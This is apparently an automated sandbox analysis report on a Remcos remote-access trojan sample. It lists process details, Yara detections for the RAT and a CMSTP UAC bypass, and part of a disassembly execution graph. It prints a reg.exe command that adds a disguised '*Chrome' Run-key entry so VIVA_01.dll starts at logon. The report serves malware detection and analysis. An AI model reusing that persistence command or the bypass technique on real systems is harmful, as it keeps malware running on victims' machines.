                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:13
                                    Start time:06:15:01
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:06:15:02
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:06:15:03
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\regsvr32.exe"
                                    Imagebase:0x330000
                                    File size:20'992 bytes
                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:06:15:03
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
                                    Imagebase:0xec0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:06:15:04
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:06:15:05
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:06:15:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0x7ff6c4fc0000
                                    File size:71'680 bytes
                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:06:15:15
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:06:15:23
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0x7ff6c4fc0000
                                    File size:71'680 bytes
                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:06:15:23
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:06:15:34
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:06:15:42
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                    Imagebase:0xa20000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.3%
                                      Total number of Nodes:1186
                                      Total number of Limit Nodes:43
                                      execution_graph 46739 2b43435 46740 2b43444 46739->46740 46741 2b43460 46739->46741 46740->46741 46742 2b4344a 46740->46742 46760 2b4f059 46741->46760 46764 2b405dd 20 API calls _Atexit 46742->46764 46746 2b4348b 46765 2b43559 35 API calls 46746->46765 46748 2b434a8 46766 2b436ce 20 API calls 2 library calls 46748->46766 46749 2b4344f _Atexit 46751 2b434b5 46752 2b434be 46751->46752 46753 2b434ca 46751->46753 46767 2b405dd 20 API calls _Atexit 46752->46767 46768 2b43559 35 API calls 46753->46768 46756 2b434c3 46770 2b46782 20 API calls __dosmaperr 46756->46770 46758 2b434e0 46758->46756 46769 2b46782 20 API calls __dosmaperr 46758->46769 46761 2b43467 GetModuleFileNameA 46760->46761 46762 2b4f062 46760->46762 46761->46746 46771 2b4ef58 48 API calls 5 library calls 46762->46771 46764->46749 46765->46748 46766->46751 46767->46756 46768->46758 46769->46756 46770->46749 46771->46761 46772 2b34887 46773 2b34893 CallCatchBlock 46772->46773 46799 2b34596 46773->46799 46775 2b3489a 46777 2b348c3 46775->46777 47101 2b349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46775->47101 46785 2b34902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46777->46785 46810 2b44251 46777->46810 46781 2b348e2 CallCatchBlock 46782 2b34962 46814 2b34b14 46782->46814 46785->46782 47103 2b433e7 35 API calls 4 library calls 46785->47103 46792 2b34984 46793 2b3498e 46792->46793 47105 2b4341f 28 API calls _Atexit 46792->47105 46795 2b34997 46793->46795 47106 2b433c2 28 API calls _Atexit 46793->47106 47107 2b3470d 13 API calls 2 library calls 46795->47107 46798 2b3499f 46798->46781 46800 2b3459f 46799->46800 47108 2b34c52 IsProcessorFeaturePresent 46800->47108 46802 2b345ab 47109 2b38f31 10 API calls 4 library calls 46802->47109 46804 2b345b0 46809 2b345b4 46804->46809 47110 2b440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46804->47110 46806 2b345bd 46807 2b345cb 46806->46807 47111 2b38f5a 8 API calls 3 library calls 46806->47111 46807->46775 46809->46775 46811 2b44268 46810->46811 47112 2b34fcb 46811->47112 46813 2b348dc 46813->46781 47102 2b441f5 5 API calls _ValidateLocalCookies 46813->47102 47120 2b36e90 46814->47120 46817 2b34968 46818 2b441a2 46817->46818 46819 2b4f059 48 API calls 46818->46819 46821 2b441ab 46819->46821 46820 2b34971 46823 2b0e9c5 46820->46823 46821->46820 47122 2b46815 35 API calls 46821->47122 47123 2b1cb50 LoadLibraryA GetProcAddress 46823->47123 46825 2b0e9e1 GetModuleFileNameW 47128 2b0f3c3 46825->47128 46827 2b0e9fd 47143 2b020f6 46827->47143 46830 2b020f6 28 API calls 46831 2b0ea1b 46830->46831 47149 2b1be1b 46831->47149 46835 2b0ea2d 47175 2b01e8d 46835->47175 46837 2b0ea36 46838 2b0ea93 46837->46838 46839 2b0ea49 46837->46839 47181 2b01e65 46838->47181 47438 2b0fbb3 95 API calls 46839->47438 46842 2b0ea5b 46844 2b01e65 22 API calls 46842->46844 46843 2b0eaa3 46846 2b01e65 22 API calls 46843->46846 46845 2b0ea67 46844->46845 47439 2b10f37 36 API calls __EH_prolog 46845->47439 46847 2b0eac2 46846->46847 47186 2b0531e 46847->47186 46850 2b0ead1 47191 2b06383 46850->47191 46851 2b0ea79 47440 2b0fb64 77 API calls 46851->47440 46855 2b0ea82 47441 2b0f3b0 70 API calls 46855->47441 46861 2b01fd8 11 API calls 46863 2b0eefb 46861->46863 46862 2b01fd8 11 API calls 46864 2b0eafb 46862->46864 47104 2b432f6 GetModuleHandleW 46863->47104 46865 2b01e65 22 API calls 46864->46865 46866 2b0eb04 46865->46866 47208 2b01fc0 46866->47208 46868 2b0eb0f 46869 2b01e65 22 API calls 46868->46869 46870 2b0eb28 46869->46870 46871 2b01e65 22 API calls 46870->46871 46872 2b0eb43 46871->46872 46873 2b0ebae 46872->46873 47442 2b06c1e 46872->47442 46874 2b01e65 22 API calls 46873->46874 46881 2b0ebbb 46874->46881 46876 2b0eb70 46877 2b01fe2 28 API calls 46876->46877 46878 2b0eb7c 46877->46878 46879 2b01fd8 11 API calls 46878->46879 46882 2b0eb85 46879->46882 46880 2b0ec02 47212 2b0d069 46880->47212 46881->46880 46886 2b13549 3 API calls 46881->46886 47447 2b13549 RegOpenKeyExA 46882->47447 46884 2b0ec08 46885 2b0ea8b 46884->46885 47215 2b1b2c3 46884->47215 46885->46861 46892 2b0ebe6 46886->46892 46890 2b0f34f 47530 2b139a9 30 API calls 46890->47530 46891 2b0ec23 46894 2b0ec76 46891->46894 47232 2b07716 46891->47232 46892->46880 47450 2b139a9 30 API calls 46892->47450 46895 2b01e65 22 API calls 46894->46895 46898 2b0ec7f 46895->46898 46907 2b0ec90 46898->46907 46908 2b0ec8b 46898->46908 46900 2b0f365 47531 2b12475 65 API calls ___scrt_fastfail 46900->47531 46901 2b0ec42 47451 2b07738 30 API calls 46901->47451 46902 2b0ec4c 46905 2b01e65 22 API calls 46902->46905 46917 2b0ec55 46905->46917 46906 2b0f36f 46910 2b1bc5e 28 API calls 46906->46910 46913 2b01e65 22 API calls 46907->46913 47454 2b07755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46908->47454 46909 2b0ec47 47452 2b07260 97 API calls 46909->47452 46914 2b0f37f 46910->46914 46915 2b0ec99 46913->46915 47341 2b13a23 RegOpenKeyExW 46914->47341 47236 2b1bc5e 46915->47236 46917->46894 46920 2b0ec71 46917->46920 46919 2b0eca4 47240 2b01f13 46919->47240 47453 2b07260 97 API calls 46920->47453 46925 2b01f09 11 API calls 46927 2b0f39c 46925->46927 46929 2b01f09 11 API calls 46927->46929 46931 2b0f3a5 46929->46931 46930 2b01e65 22 API calls 46932 2b0ecc1 46930->46932 47344 2b0dd42 46931->47344 46936 2b01e65 22 API calls 46932->46936 46938 2b0ecdb 46936->46938 46937 2b0f3af 46939 2b01e65 22 API calls 46938->46939 46940 2b0ecf5 46939->46940 46941 2b01e65 22 API calls 46940->46941 46943 2b0ed0e 46941->46943 46942 2b0ed7b 46945 2b0ed8a 46942->46945 46951 2b0ef06 ___scrt_fastfail 46942->46951 46943->46942 46944 2b01e65 22 API calls 46943->46944 46949 2b0ed23 _wcslen 46944->46949 46946 2b0ed93 46945->46946 46974 2b0ee0f ___scrt_fastfail 46945->46974 46947 2b01e65 22 API calls 46946->46947 46948 2b0ed9c 46947->46948 46950 2b01e65 22 API calls 46948->46950 46949->46942 46953 2b01e65 22 API calls 46949->46953 46952 2b0edae 46950->46952 47515 2b136f8 RegOpenKeyExA 46951->47515 46956 2b01e65 22 API calls 46952->46956 46954 2b0ed3e 46953->46954 46958 2b01e65 22 API calls 46954->46958 46957 2b0edc0 46956->46957 46961 2b01e65 22 API calls 46957->46961 46959 2b0ed53 46958->46959 47455 2b0da34 46959->47455 46960 2b0ef51 46962 2b01e65 22 API calls 46960->46962 46964 2b0ede9 46961->46964 46965 2b0ef76 46962->46965 46970 2b01e65 22 API calls 46964->46970 47262 2b02093 46965->47262 46967 2b01f13 28 API calls 46969 2b0ed72 46967->46969 46972 2b01f09 11 API calls 46969->46972 46973 2b0edfa 46970->46973 46971 2b0ef88 47268 2b1376f RegCreateKeyA 46971->47268 46972->46942 47513 2b0cdf9 45 API calls _wcslen 46973->47513 47252 2b13947 46974->47252 46978 2b0ee0a 46978->46974 46980 2b0eea3 ctype 46983 2b01e65 22 API calls 46980->46983 46981 2b01e65 22 API calls 46982 2b0efaa 46981->46982 47274 2b3baac 46982->47274 46984 2b0eeba 46983->46984 46984->46960 46987 2b0eece 46984->46987 46990 2b01e65 22 API calls 46987->46990 46988 2b0efc1 47518 2b1cd9b 86 API calls ___scrt_fastfail 46988->47518 46989 2b0efe4 46993 2b02093 28 API calls 46989->46993 46991 2b0eed7 46990->46991 46994 2b1bc5e 28 API calls 46991->46994 46996 2b0eff9 46993->46996 46997 2b0eee3 46994->46997 46995 2b0efc8 CreateThread 46995->46989 48251 2b1d45d 10 API calls 46995->48251 46998 2b02093 28 API calls 46996->46998 47514 2b0f474 103 API calls 46997->47514 47000 2b0f008 46998->47000 47278 2b1b4ef 47000->47278 47001 2b0eee8 47001->46960 47003 2b0eeef 47001->47003 47003->46885 47005 2b01e65 22 API calls 47006 2b0f019 47005->47006 47007 2b01e65 22 API calls 47006->47007 47008 2b0f02b 47007->47008 47009 2b01e65 22 API calls 47008->47009 47010 2b0f04b 47009->47010 47011 2b3baac 39 API calls 47010->47011 47012 2b0f058 47011->47012 47013 2b01e65 22 API calls 47012->47013 47014 2b0f063 47013->47014 47015 2b01e65 22 API calls 47014->47015 47016 2b0f074 47015->47016 47017 2b01e65 22 API calls 47016->47017 47018 2b0f089 47017->47018 47019 2b01e65 22 API calls 47018->47019 47020 2b0f09a 47019->47020 47021 2b0f0a1 StrToIntA 47020->47021 47302 2b09de4 47021->47302 47024 2b01e65 22 API calls 47025 2b0f0bc 47024->47025 47026 2b0f101 47025->47026 47027 2b0f0c8 47025->47027 47030 2b01e65 22 API calls 47026->47030 47519 2b344ea 47027->47519 47032 2b0f111 47030->47032 47031 2b01e65 22 API calls 47033 2b0f0e4 47031->47033 47035 2b0f159 47032->47035 47036 2b0f11d 47032->47036 47034 2b0f0eb CreateThread 47033->47034 47034->47026 48254 2b19fb4 102 API calls __EH_prolog 47034->48254 47037 2b01e65 22 API calls 47035->47037 47038 2b344ea new 22 API calls 47036->47038 47039 2b0f162 47037->47039 47040 2b0f126 47038->47040 47043 2b0f1cc 47039->47043 47044 2b0f16e 47039->47044 47041 2b01e65 22 API calls 47040->47041 47042 2b0f138 47041->47042 47045 2b0f13f CreateThread 47042->47045 47046 2b01e65 22 API calls 47043->47046 47047 2b01e65 22 API calls 47044->47047 47045->47035 48253 2b19fb4 102 API calls __EH_prolog 47045->48253 47048 2b0f1d5 47046->47048 47049 2b0f17e 47047->47049 47050 2b0f1e1 47048->47050 47051 2b0f21a 47048->47051 47052 2b01e65 22 API calls 47049->47052 47054 2b01e65 22 API calls 47050->47054 47327 2b1b60d GetComputerNameExW GetUserNameW 47051->47327 47055 2b0f193 47052->47055 47057 2b0f1ea 47054->47057 47526 2b0d9e8 31 API calls 47055->47526 47061 2b01e65 22 API calls 47057->47061 47058 2b01f13 28 API calls 47060 2b0f22e 47058->47060 47063 2b01f09 11 API calls 47060->47063 47064 2b0f1ff 47061->47064 47062 2b0f1a6 47065 2b01f13 28 API calls 47062->47065 47066 2b0f237 47063->47066 47075 2b3baac 39 API calls 47064->47075 47067 2b0f1b2 47065->47067 47068 2b0f240 SetProcessDEPPolicy 47066->47068 47069 2b0f243 CreateThread 47066->47069 47072 2b01f09 11 API calls 47067->47072 47068->47069 47070 2b0f264 47069->47070 47071 2b0f258 CreateThread 47069->47071 48223 2b0f7a7 47069->48223 47073 2b0f279 47070->47073 47074 2b0f26d CreateThread 47070->47074 47071->47070 48255 2b120f7 137 API calls 47071->48255 47076 2b0f1bb CreateThread 47072->47076 47078 2b0f2cc 47073->47078 47080 2b02093 28 API calls 47073->47080 47074->47073 48250 2b126db 38 API calls ___scrt_fastfail 47074->48250 47077 2b0f20c 47075->47077 47076->47043 48252 2b01be9 49 API calls 47076->48252 47527 2b0c162 7 API calls 47077->47527 47338 2b134ff RegOpenKeyExA 47078->47338 47081 2b0f29c 47080->47081 47528 2b052fd 28 API calls 47081->47528 47086 2b0f2ed 47088 2b1bc5e 28 API calls 47086->47088 47090 2b0f2fd 47088->47090 47529 2b1361b 31 API calls 47090->47529 47095 2b0f313 47096 2b01f09 11 API calls 47095->47096 47099 2b0f31e 47096->47099 47097 2b0f346 DeleteFileW 47098 2b0f34d 47097->47098 47097->47099 47098->46906 47099->46906 47099->47097 47100 2b0f334 Sleep 47099->47100 47100->47099 47101->46775 47102->46785 47103->46782 47104->46792 47105->46793 47106->46795 47107->46798 47108->46802 47109->46804 47110->46806 47111->46809 47113 2b34fd6 IsProcessorFeaturePresent 47112->47113 47114 2b34fd4 47112->47114 47116 2b35018 47113->47116 47114->46813 47119 2b34fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47116->47119 47118 2b350fb 47118->46813 47119->47118 47121 2b34b27 GetStartupInfoW 47120->47121 47121->46817 47122->46821 47124 2b1cb8f LoadLibraryA GetProcAddress 47123->47124 47125 2b1cb7f GetModuleHandleA GetProcAddress 47123->47125 47126 2b1cbb8 44 API calls 47124->47126 47127 2b1cba8 LoadLibraryA GetProcAddress 47124->47127 47125->47124 47126->46825 47127->47126 47532 